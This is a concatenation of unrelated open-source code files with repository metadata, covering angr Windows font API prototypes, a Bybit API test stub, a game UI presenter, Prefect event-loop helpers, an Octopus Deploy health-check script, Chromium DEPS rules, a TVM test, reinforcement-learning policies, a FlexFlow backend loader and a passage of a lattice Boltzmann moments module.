'TTRunValidationTests': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"ulStructSize": SimTypeInt(signed=False, label="UInt32"), "lTestFromSize": SimTypeInt(signed=True, label="Int32"), "lTestToSize": SimTypeInt(signed=True, label="Int32"), "ulCharSet": SimTypeInt(signed=False, label="UInt32"), "usReserved1": SimTypeShort(signed=False, label="UInt16"), "usCharCodeCount": SimTypeShort(signed=False, label="UInt16"), "pusCharCodeSet": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTVALIDATIONTESTSPARAMS", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pTestParam"]),
#
'TTIsEmbeddingEnabled': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pbEnabled"]),
#
'TTIsEmbeddingEnabledForFacename': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszFacename", "pbEnabled"]),
#
'TTEnableEmbeddingForFacename': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszFacename", "bEnable"]),
#
'TTEmbedFontEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypeInt(signed=False, label="EMBED_FONT_CHARSET"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), label="LPArray", offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeShort(signed=False, label="UInt16"), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRootStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRootStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTEMBEDINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "ulFlags", "ulCharSet", "pulPrivStatus", "pulStatus", "lpfnWriteToStream", "lpvWriteStream", "pulCharCodeSet", "usCharCodeCount", "usLanguage", "pTTEmbedInfo"]),
#
'TTRunValidationTestsEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"ulStructSize": SimTypeInt(signed=False, label="UInt32"), "lTestFromSize": SimTypeInt(signed=True, label="Int32"), "lTestToSize": SimTypeInt(signed=True, label="Int32"), "ulCharSet": SimTypeInt(signed=False, label="UInt32"), "usReserved1": SimTypeShort(signed=False, label="UInt16"), "usCharCodeCount": SimTypeShort(signed=False, label="UInt16"), "pulCharCodeSet": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="TTVALIDATIONTESTSPARAMSEX", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pTestParam"]),
#
'TTGetNewFontName': SimTypeFunction([SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["phFontReference", "wzWinFamilyName", "cchMaxWinName", "szMacFamilyName", "cchMaxMacName"]),
}
lib.set_prototypes(prototypes)
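# Usage sketch (assuming angr's SimLibrary interface; the key is taken from the
# prototype table above, everything else is illustrative):
#   proto = lib.prototypes['TTGetEmbeddingType']  # -> the SimTypeFunction registered above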
|
f236430321da95eba72f28cdbd574848a13a7d7d
|
684df684759bfbef64b0fbcde9eb2b898a2e2061
|
/swagger-gen/python/test/test_linear_order_api.py
|
84c25b72399b928d2b6bcedb10b4639694393d10
|
[] |
no_license
|
bybit-exchange/api-connectors
|
ae13caecb98c82460c0a24b910f2e9c1eb80b9bc
|
cc021a371bde30c2fd282be9fdc8eef0ed0e362e
|
refs/heads/master
| 2021-12-31T10:23:24.429638
| 2021-11-24T16:37:18
| 2021-11-24T16:37:18
| 213,896,494
| 192
| 185
| null | 2023-03-03T12:50:12
| 2019-10-09T11:10:19
|
C#
|
UTF-8
|
Python
| false
| false
| 1,705
|
py
|
test_linear_order_api.py
|
# coding: utf-8
"""
Bybit API
## REST API for the Bybit Exchange. Base URI: [https://api.bybit.com] # noqa: E501
OpenAPI spec version: 0.2.11
Contact: support@bybit.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.api.linear_order_api import LinearOrderApi # noqa: E501
from swagger_client.rest import ApiException
class TestLinearOrderApi(unittest.TestCase):
"""LinearOrderApi unit test stubs"""
def setUp(self):
self.api = swagger_client.api.linear_order_api.LinearOrderApi() # noqa: E501
def tearDown(self):
pass
def test_linear_order_cancel(self):
"""Test case for linear_order_cancel
Cancel Active Order # noqa: E501
"""
pass
def test_linear_order_cancel_all(self):
"""Test case for linear_order_cancel_all
Cancel all active orders. # noqa: E501
"""
pass
def test_linear_order_get_orders(self):
"""Test case for linear_order_get_orders
Get linear Active Orders # noqa: E501
"""
pass
def test_linear_order_new(self):
"""Test case for linear_order_new
Create Active Order # noqa: E501
"""
pass
def test_linear_order_query(self):
"""Test case for linear_order_query
Get Active Orders(real-time) # noqa: E501
"""
pass
def test_linear_order_replace(self):
"""Test case for linear_order_replace
Replace Active Order # noqa: E501
"""
pass
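    # A filled-in stub might look like the sketch below (method name from the
    # generated client above; parameters and values are illustrative, not a
    # definitive call against the Bybit API):
    #   result = self.api.linear_order_new(
    #       side='Buy', symbol='BTCUSDT', order_type='Limit',
    #       qty=0.001, price=9000, time_in_force='GoodTillCancel')
    #   self.assertIsNotNone(result)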
if __name__ == '__main__':
unittest.main()
|
d1ac21320769f48e14b9cc035b4d9c691b93835f
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/battle_results/presenter/event.py
|
6d44a42e572b4e6dab02e28a1b45715ff11b23c4
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,664
|
py
|
event.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/battle_results/presenter/event.py
import typing
from frameworks.wulf import Array
from gui.impl.gen.view_models.views.lobby.postbattle.widget_model import WidgetModel
from gui.server_events.event_items import WtQuest
from gui.shared.gui_items.loot_box import EventLootBoxes
from gui.shared.missions.packers.bonus import packBonusModelAndTooltipData, getDefaultBonusPackersMap, BonusUIPacker
from gui.wt_event.wt_event_bonuses_packers import WtLootboxTokenBonusPacker, WtTicketTokenBonusPacker
from helpers import dependency
from gui.server_events.bonuses import mergeBonuses
from skeletons.gui.game_control import IEventBattlesController, ILootBoxesController
if typing.TYPE_CHECKING:
from gui.server_events.bonuses import TokensBonus
from gui.battle_results.reusable import ReusableInfo
from gui.impl.gen.view_models.views.lobby.postbattle.widgets_model import WidgetsModel
def _getEventBonusWidgetsMap():
return {'battleToken': _WtWidgetTokenBonusPacker(),
'ticket': _WtWidgetTicketTokenBonusPacker()}
def _getWtEventBonusPacker():
mapping = getDefaultBonusPackersMap()
mapping.update(_getEventBonusWidgetsMap())
return BonusUIPacker(mapping)
class _WtWidgetTokenBonusPacker(WtLootboxTokenBonusPacker):
__boxesCtrl = dependency.descriptor(ILootBoxesController)
__gameEventCtrl = dependency.descriptor(IEventBattlesController)
@classmethod
def _getBonusModel(cls):
return WidgetModel()
@classmethod
def _packToken(cls, token, model):
super(_WtWidgetTokenBonusPacker, cls)._packToken(token, model)
disabled = True
if cls.__gameEventCtrl.isModeActive():
lootBox = cls._itemsCache.items.tokens.getLootBoxByTokenID(token.id)
if lootBox is not None:
lootBoxesCount = cls.__boxesCtrl.getLootBoxesCountByType(lootBox.getType())
disabled = lootBoxesCount == 0
model = typing.cast(WidgetModel, model)
model.setIsActionDisabled(disabled)
return
class _WtWidgetTicketTokenBonusPacker(WtTicketTokenBonusPacker):
__gameEventCtrl = dependency.descriptor(IEventBattlesController)
@classmethod
def _getBonusModel(cls):
return WidgetModel()
@classmethod
def _packToken(cls, token, model):
super(_WtWidgetTicketTokenBonusPacker, cls)._packToken(token, model)
model = typing.cast(WidgetModel, model)
model.setIsActionDisabled(not (cls.__gameEventCtrl.isModeActive() and cls.__gameEventCtrl.hasEnoughTickets()))
@dependency.replace_none_kwargs(gameEventCtrl=IEventBattlesController)
def _sortMap(gameEventCtrl=None):
return {gameEventCtrl.getConfig().ticketToken: 1,
EventLootBoxes.WT_HUNTER: 2,
EventLootBoxes.WT_BOSS: 2}
def setWidgets(model, reusable, _):
questsProgress = reusable.progress.getPlayerQuestProgress()
packer = _getWtEventBonusPacker()
bonuses = []
for e, _, _, _, isCompleted in questsProgress:
if isCompleted:
if isinstance(e, WtQuest):
bonuses.extend([ bonus for bonus in e.getBonuses() if bonus.getName() in _getEventBonusWidgetsMap().keys() ])
else:
bonuses.extend(e.getBonuses())
bonuses = mergeBonuses(bonuses)
modelsArr = Array[WidgetModel]()
packBonusModelAndTooltipData(bonuses, packer, modelsArr)
sortMap = _sortMap()
widgetsArr = model.getWidgets()
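    # ticket bonus widgets sort first, then lootboxes; names missing from the map fall to the end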
for bonusModel in sorted(modelsArr, key=lambda b: sortMap.get(b.getName(), len(sortMap))):
widgetsArr.addViewModel(bonusModel)
modelsArr.clear()
|
677bbd52fe334fa31468f76c9517218f4e8907a8
|
abe6c00f9790df7e6ef20dc02d0b1b225b5020cb
|
/src/prefect/_internal/concurrency/event_loop.py
|
3f4f187231ac669e381734479325d2ebcf8ee5db
|
[
"Apache-2.0"
] |
permissive
|
PrefectHQ/prefect
|
000e6c5f7df80f76a181f0a30f8661c96417c8bd
|
2c50d2b64c811c364cbc5faa2b5c80a742572090
|
refs/heads/main
| 2023-09-05T20:25:42.965208
| 2023-09-05T18:58:06
| 2023-09-05T18:58:06
| 139,199,684
| 12,917
| 1,539
|
Apache-2.0
| 2023-09-14T20:25:45
| 2018-06-29T21:59:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,594
|
py
|
event_loop.py
|
"""
Thread-safe utilities for working with asynchronous event loops.
"""
import asyncio
import concurrent.futures
import functools
from typing import Awaitable, Callable, Coroutine, Optional, TypeVar
from typing_extensions import ParamSpec
P = ParamSpec("P")
T = TypeVar("T")
def get_running_loop() -> Optional[asyncio.BaseEventLoop]:
"""
Get the current running loop.
Returns `None` if there is no running loop.
"""
try:
return asyncio.get_running_loop()
except RuntimeError:
return None
def call_in_loop(
__loop: asyncio.AbstractEventLoop,
__fn: Callable[P, T],
*args: P.args,
**kwargs: P.kwargs
) -> T:
"""
    Run a synchronous call in an event loop's thread from another thread.
This function is blocking and not safe to call from an asynchronous context.
Returns the result of the call.
"""
if __loop is get_running_loop():
return __fn(*args, **kwargs)
else:
future = call_soon_in_loop(__loop, __fn, *args, **kwargs)
return future.result()
def call_soon_in_loop(
__loop: asyncio.AbstractEventLoop,
__fn: Callable[P, T],
*args: P.args,
**kwargs: P.kwargs
) -> concurrent.futures.Future:
"""
Run a synchronous call in an event loop's thread from another thread.
This function is non-blocking and safe to call from an asynchronous context.
Returns a future that can be used to retrieve the result of the call.
"""
future = concurrent.futures.Future()
@functools.wraps(__fn)
def wrapper() -> None:
try:
result = __fn(*args, **kwargs)
except BaseException as exc:
future.set_exception(exc)
if not isinstance(exc, Exception):
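                # re-raise KeyboardInterrupt/SystemExit so the loop thread also sees them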
raise
else:
future.set_result(result)
# `call_soon...` returns a `Handle` object which doesn't provide access to the
# result of the call. We wrap the call with a future to facilitate retrieval.
if __loop is get_running_loop():
__loop.call_soon(wrapper)
else:
__loop.call_soon_threadsafe(wrapper)
return future
async def run_coroutine_in_loop_from_async(
__loop: asyncio.AbstractEventLoop, __coro: Coroutine
) -> Awaitable:
"""
Run an asynchronous call in an event loop from an asynchronous context.
Returns an awaitable that returns the result of the coroutine.
"""
if __loop is get_running_loop():
return await __coro
else:
return await asyncio.wrap_future(
asyncio.run_coroutine_threadsafe(__coro, __loop)
)
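# Usage sketch (not part of the module; names below are illustrative). Run an
# event loop in a daemon thread and submit blocking work to it:
#   import threading
#   loop = asyncio.new_event_loop()
#   threading.Thread(target=loop.run_forever, daemon=True).start()
#   assert call_in_loop(loop, sum, [1, 2, 3]) == 6  # blocks until the loop runs it
#   loop.call_soon_threadsafe(loop.stop)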
|
271569242c4de1203f0831fdeae61171b1613b0e
|
41ffc3633d0b6ef61105fa19ad09794cd56f1453
|
/REST/python/Tasks/run-healthcheck.py
|
da2f7bc4c63c6823a35ada99c6f9337ec03119b9
|
[
"Apache-2.0"
] |
permissive
|
OctopusDeploy/OctopusDeploy-Api
|
4fb17afab9906708025fc1f391178cb2c8cb157c
|
c07ba75a893a441c0042dcaea2ea9b4a4ea85ae0
|
refs/heads/master
| 2023-08-31T01:20:12.281128
| 2023-08-17T17:13:44
| 2023-08-17T17:13:44
| 9,934,665
| 226
| 159
|
NOASSERTION
| 2023-09-13T16:02:21
| 2013-05-08T11:15:54
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 2,837
|
py
|
run-healthcheck.py
|
import json
import requests
def get_octopus_resource(uri, headers, skip_count = 0):
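    # Recursively page through an Octopus collection endpoint via the skip parameter;
    # plain (non-collection) responses are returned unchanged.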
items = []
skip_querystring = ""
if '?' in uri:
skip_querystring = '&skip='
else:
skip_querystring = '?skip='
response = requests.get((uri + skip_querystring + str(skip_count)), headers=headers)
response.raise_for_status()
# Get results of API call
results = json.loads(response.content.decode('utf-8'))
# Store results
if 'Items' in results.keys():
items += results['Items']
# Check to see if there are more results
if (len(results['Items']) > 0) and (len(results['Items']) == results['ItemsPerPage']):
skip_count += results['ItemsPerPage']
items += get_octopus_resource(uri, headers, skip_count)
else:
return results
    # return the accumulated items from all pages
return items
def convert(seconds):
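    # Render a duration in seconds as "H:MM:SS", the timeout format used in the task payload below.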
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
return "%d:%02d:%02d" % (hour, minutes, seconds)
octopus_server_uri = 'https://YourURL'
octopus_api_key = 'API-YourAPIKey'
headers = {'X-Octopus-ApiKey': octopus_api_key}
space_name = "Default"
description = 'Health check started from Python script'
timeout_after_minutes = 5
machine_timeout_after_minutes = 5
environment_name = 'Development'
machine_names = [] # blank will check all machines in environment
# Get space
uri = '{0}/api/spaces'.format(octopus_server_uri)
spaces = get_octopus_resource(uri, headers)
space = next((x for x in spaces if x['Name'] == space_name), None)
# Get environment
uri = '{0}/api/{1}/environments'.format(octopus_server_uri, space['Id'])
environments = get_octopus_resource(uri, headers)
environment = next((e for e in environments if e['Name'] == environment_name), None)
# Get machines to check
machines_to_check = []
uri = '{0}/api/{1}/machines?environmentids={2}'.format(octopus_server_uri, space['Id'], environment['Id'])
machines = get_octopus_resource(uri, headers)
for machine in machines:
if len(machine_names) == 0:
machines_to_check.append(machine['Id'])
else:
if machine['Name'] in machine_names:
machines_to_check.append(machine['Id'])
# Construct payload
json_payload = {
'SpaceId': space['Id'],
'Name': 'Health',
'Description': description,
'Arguments': {
'Timeout': convert((timeout_after_minutes * 60)),
'MachineTimeout': convert((machine_timeout_after_minutes * 60)),
'EnvironmentId': environment['Id'],
'MachineIds': machines_to_check
}
}
print(json_payload)
uri = '{0}/api/{1}/tasks'.format(octopus_server_uri, space['Id'])
response = requests.post(uri, headers=headers, json=json_payload)
response.raise_for_status()
|
af2121bfd43ed6bd1c56b649f80e567c30725a8b
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/components/embedder_support/android/DEPS
|
f874c1236da3151da2a940a91d1a70f9ac22dfe4
|
[
"BSD-3-Clause"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 557
|
DEPS
|
include_rules = [
"-content/public/android/java",
"+content/public/android/java/src/org/chromium/content_public",
"+content/public/test/android",
"+cc",
"+components/embedder_support/android/web_contents_delegate_jni_headers",
"+components/keyed_service",
"+components/url_formatter/android/java",
"+content/public/browser",
"+content/public/common",
"+net/android/java/src/org/chromium/net",
"+third_party/blink/public/common/context_menu_data/context_menu_data.h",
"+ui/accessibility",
"+ui/android",
"+ui/base",
"+ui/gfx"
]
|
|
b0c50b90b0a277a2c6a9a43daac3673657b6e198
|
2d05050d0ada29f7680b4df20c10bb85b0530e45
|
/tests/python/relay/test_pass_annotate_spans_defuse.py
|
c513c592d61174df7de2ea35deb04c543ef7237b
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"Zlib",
"LLVM-exception",
"BSD-2-Clause"
] |
permissive
|
apache/tvm
|
87cb617f9a131fa44e1693303aaddf70e7a4c403
|
d75083cd97ede706338ab413dbc964009456d01b
|
refs/heads/main
| 2023-09-04T11:24:26.263032
| 2023-09-04T07:26:00
| 2023-09-04T07:26:00
| 70,746,484
| 4,575
| 1,903
|
Apache-2.0
| 2023-09-14T19:06:33
| 2016-10-12T22:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 2,017
|
py
|
test_pass_annotate_spans_defuse.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for annotating spans."""
import tvm
import tvm.relay as relay
from tvm.relay import testing
import tvm.testing
def test_annotate_spans_compatibility():
data = relay.var("data", relay.TensorType((1, 3, 64, 64), "float32"))
weight = relay.var("weight")
bn_gamma = relay.var("bn_gamma")
bn_beta = relay.var("bn_beta")
bn_mmean = relay.var("bn_mean")
bn_mvar = relay.var("bn_var")
simple_net = relay.nn.conv2d(
data=data, weight=weight, kernel_size=(3, 3), channels=3, padding=(1, 1)
)
simple_net = relay.nn.batch_norm(simple_net, bn_gamma, bn_beta, bn_mmean, bn_mvar)[0]
simple_net = relay.Function(relay.analysis.free_vars(simple_net), simple_net)
module, params = testing.create_workload(simple_net)
# Apply some simple passes to legalize the IR.
with tvm.transform.PassContext(opt_level=0):
module, params = relay.optimize(
module, target=tvm.testing.enabled_targets()[0][0], params=params
)
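    # AnnotateSpans attaches source-span info to every expression; DefuseOps must then run cleanly on the annotated module.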
seq = tvm.transform.Sequential([relay.transform.AnnotateSpans(), relay.transform.DefuseOps()])
with tvm.transform.PassContext(opt_level=3):
module = seq(module)
if __name__ == "__main__":
tvm.testing.main()
|
521e4212a5ef4bcb6c779a6db94783a36ada7bb1
|
c4714904de05427f52d846678463811898033e4f
|
/Safe-RL/safeRL/HCOPE/policies.py
|
15ab8078ce158f2a09a8670740fd65424da0ebdf
|
[
"MIT"
] |
permissive
|
chauncygu/Safe-Reinforcement-Learning-Baselines
|
f19d60058eab4a7ff78c67bc6e845b9ba7dfe454
|
8500c8dd90a2b59a91b988a3c83e529f6c69332f
|
refs/heads/main
| 2023-08-31T12:42:44.973962
| 2023-08-19T13:11:02
| 2023-08-19T13:11:02
| 462,251,155
| 233
| 42
| null | 2023-08-24T11:55:14
| 2022-02-22T10:40:44
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,788
|
py
|
policies.py
|
'''
Policy class for computing action from weights and observation vector.
Horia Mania --- hmania@berkeley.edu
Aurelia Guy
Benjamin Recht
'''
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.convert_parameters import vector_to_parameters, parameters_to_vector
from filter import get_filter
class Policy(object):
def __init__(self, policy_params):
self.ob_dim = policy_params['ob_dim']
self.ac_dim = policy_params['ac_dim']
self.weights = np.empty(0)
# a filter for updating statistics of the observations and normalizing inputs to the policies
self.observation_filter = get_filter(policy_params['ob_filter'], shape = (self.ob_dim,))
self.update_filter = True
def update_weights(self, new_weights):
self.weights[:] = new_weights[:]
return
def get_weights(self):
return self.weights
def get_observation_filter(self):
return self.observation_filter
def act(self, ob):
raise NotImplementedError
def copy(self):
raise NotImplementedError
class LinearPolicy(Policy):
"""
Linear policy class that computes action as <w, ob>.
"""
def __init__(self, policy_params):
Policy.__init__(self, policy_params)
self.weights = np.zeros((self.ac_dim, self.ob_dim), dtype = np.float64)
def act(self, ob):
ob = self.observation_filter(ob, update=self.update_filter)
return np.dot(self.weights, ob)
def get_weights_plus_stats(self):
mu, std = self.observation_filter.get_stats()
aux = np.asarray([self.weights, mu, std])
return aux
class MLP(nn.Module):
def __init__(self, input, output):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input, 32)
self.fc2 = nn.Linear(32, output)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
# print(x)
#count = x.detach().numpy()
#count = np.where(count==0.0)
#print("COUNT",count[0].shape)
#print("ZERO {}".format(128-np.sum(np.nonzero(count)[0])))
x = self.fc2(x)
return x
class MLP_probs(nn.Module):
def __init__(self, input, output):
super(MLP_probs, self).__init__()
self.fc1 = nn.Linear(input, 32)
self.fc2 = nn.Linear(32, output)
#self.fc1 = nn.Linear(input, output)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
# print(x)
#count = x.detach().numpy()
#count = np.where(count==0.0)
#print("COUNT",count[0].shape)
#print("ZERO {}".format(128-np.sum(np.nonzero(count)[0])))
#x = self.fc2(x)
        x = F.softmax(x, dim=-1)
return x
class BilayerPolicy_softmax(Policy):
"""
    Two-layer MLP policy that outputs a softmax distribution over discrete actions.
"""
def __init__(self, policy_params,trained_weights= None):
Policy.__init__(self, policy_params)
self.net = MLP_probs(self.ob_dim, self.ac_dim)
#lin_policy = np.load('/home/harshit/work/ARS/trained_policies/Policy_Testerbi2/bi_policy_num_plus149.npz')
#lin_policy = lin_policy.items()[0][1]
#self.weights=None
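        # flatten all network parameters into one numpy vector so ARS-style perturbations can act on it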
self.weights = parameters_to_vector(self.net.parameters()).detach().double().numpy()
if trained_weights is not None:
#print("hieohrfoiahfoidanfkjahdfj")
self.net.load_state_dict(torch.load(trained_weights))
#vector_to_parameters(torch.tensor(trained_weights), self.net.parameters())
self.weights = parameters_to_vector(self.net.parameters()).detach().double().numpy()
def update_weights(self, new_weights):
vector_to_parameters(torch.tensor(new_weights), self.net.parameters())
return
def act(self, ob,greedy=True):
ob = self.observation_filter(ob, update=self.update_filter)
obs = torch.from_numpy(ob)
probs = self.net(obs).detach().double().numpy()
        if not greedy:
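            # sample stochastically from the categorical action distribution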
action = np.random.choice(np.arange(probs.shape[0]), replace=True, p=probs)
return action,probs[action]
return np.argmax(probs),probs[np.argmax(probs)]
def act_action(self, ob,action):
ob = self.observation_filter(ob, update=self.update_filter)
obs = torch.from_numpy(ob)
probs = self.net(obs).detach().double().numpy()
return action,probs[action]
def get_weights_plus_stats(self):
mu, std = self.observation_filter.get_stats()
aux = np.asarray([self.weights, mu, std])
return aux
class BilayerPolicy(Policy):
"""
    Two-layer MLP policy that maps observations to continuous actions.
"""
def __init__(self, policy_params,trained_weights= None):
Policy.__init__(self, policy_params)
self.net = MLP(self.ob_dim, self.ac_dim)
self.weights = parameters_to_vector(self.net.parameters()).detach().double().numpy()
def update_weights(self, new_weights):
vector_to_parameters(torch.tensor(new_weights), self.net.parameters())
return
def act(self, ob):
ob = self.observation_filter(ob, update=self.update_filter)
obs = torch.from_numpy(ob)
return self.net(obs).detach().double().numpy()
def get_weights_plus_stats(self):
mu, std = self.observation_filter.get_stats()
aux = np.asarray([self.weights, mu, std])
return aux
def check_implementation():
policy_params={'type':'linear',
'ob_filter':'MeanStdFilter',
'ob_dim': 24,
'ac_dim': 4}
policy = BilayerPolicy(policy_params)
print(policy.net)
#check_implementation()
|
d30e88e116bef721cc656d54339760cb428c887b
|
3d4c7b9c179322e6bdb3c7a0c137919364806cb3
|
/python/flexflow/keras/backend/__init__.py
|
738f8e0161be190f5102d7ba33c8172e6964c15c
|
[
"Apache-2.0"
] |
permissive
|
flexflow/FlexFlow
|
291282d27009924a427966e899d7c2fda9c20cec
|
b2ec6cb5d2b898db1ad4df32adf5699bc48aaac7
|
refs/heads/inference
| 2023-09-04T05:25:02.250225
| 2023-09-03T14:15:07
| 2023-09-03T14:15:07
| 160,988,469
| 1,139
| 186
|
Apache-2.0
| 2023-09-14T17:56:24
| 2018-12-08T23:43:13
|
C++
|
UTF-8
|
Python
| false
| false
| 1,149
|
py
|
__init__.py
|
# Copyright 2023 CMU, Facebook, LANL, MIT, NVIDIA, and Stanford (alphabetical)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import print_function
import sys
from .backend_functions import batch_dot, sin, cos, exp, pow, sum
# Default backend: FlexFlow.
_BACKEND = 'flexflow'
# import backend
if _BACKEND == 'flexflow':
sys.stderr.write('Using flexflow backend.\n')
from .flexflow_backend import *
else:
raise ValueError('Unknown backend: ' + str(_BACKEND))
def backend():
"""Publicly accessible method
for determining the current backend.
"""
return _BACKEND
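# Usage sketch (illustrative):
#   from flexflow.keras.backend import backend
#   backend()  # -> 'flexflow'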
|
504a11bbf36e5618aa9e16a805dea02858fcf6ac
|
e7f38fa0aea00207bc94c542524bcf36a540f902
|
/lettuce/moments.py
|
7ea9547031a7cb1191d23a64926d03f74e9c8e8f
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
lettucecfd/lettuce
|
c5cf4c27ee66022e9b6d94ff0380c6190ec59fae
|
63be9197efeb88b843fd349b9e8d1b13d1634c1c
|
refs/heads/master
| 2023-04-28T15:48:42.200866
| 2023-04-13T12:54:10
| 2023-04-13T12:54:10
| 185,307,088
| 106
| 22
|
MIT
| 2023-04-18T07:38:28
| 2019-05-07T02:37:05
|
Python
|
UTF-8
|
Python
| false
| false
| 24,365
|
py
|
moments.py
|
"""
Moments and cumulants of the distribution function.
"""
import warnings
import torch
import lettuce
from lettuce.util import LettuceException, InefficientCodeWarning, get_subclasses, ExperimentalWarning
from lettuce.stencils import Stencil, D1Q3, D2Q9, D3Q27
import numpy as np
__all__ = [
"moment_tensor", "get_default_moment_transform", "Moments", "Transform", "D1Q3Transform",
"D2Q9Lallemand", "D2Q9Dellar", "D3Q27Hermite"
]
_ALL_STENCILS = get_subclasses(Stencil, module=lettuce)
def moment_tensor(e, multiindex):
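    # Each row of the result is one moment: the product over dimensions d of e[i, d] ** multiindex[..., d].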
if isinstance(e, torch.Tensor):
return torch.prod(torch.pow(e, multiindex[..., None, :]), dim=-1)
else:
return np.prod(np.power(e, multiindex[..., None, :]), axis=-1)
def get_default_moment_transform(lattice):
if lattice.stencil == D1Q3:
return D1Q3Transform(lattice)
if lattice.stencil == D2Q9:
return D2Q9Lallemand(lattice)
else:
raise LettuceException(f"No default moment transform for lattice {lattice}.")
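# Usage sketch (assuming a lettuce Lattice instance; names are illustrative):
#   trafo = get_default_moment_transform(lattice)
#   m = trafo.transform(f)            # populations -> moments
#   f2 = trafo.inverse_transform(m)   # moments -> populations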
class Moments:
def __init__(self, lattice):
self.rho = moment_tensor(lattice.e, lattice.convert_to_tensor(np.zeros(lattice.D)))
self.j = moment_tensor(lattice.e, lattice.convert_to_tensor(np.eye(lattice.D)))
# ... TODO ...
class Transform:
"""Base class that defines the signature for all moment (and cumulant) transforms.
"""
def __init__(self, lattice, names=None):
self.lattice = lattice
self.names = [f"m{i}" for i in range(lattice.Q)] if names is None else names
def __getitem__(self, moment_names):
if not isinstance(moment_names, tuple):
moment_names = [moment_names]
return [self.names.index(name) for name in moment_names]
def transform(self, f):
return f
def inverse_transform(self, m):
return m
